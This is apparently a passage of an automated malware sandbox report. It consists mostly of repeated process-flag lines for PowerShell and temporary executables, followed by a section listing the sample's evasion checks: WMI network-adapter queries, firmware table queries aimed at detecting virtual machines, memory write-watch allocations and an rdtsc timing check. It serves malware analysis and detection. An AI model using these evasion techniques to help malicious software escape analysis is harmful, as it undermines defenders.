                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeMemory allocated: E90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeMemory allocated: 2CD0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeMemory allocated: 1210000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA5731 rdtsc 1_2_00007FFDFAFA5731
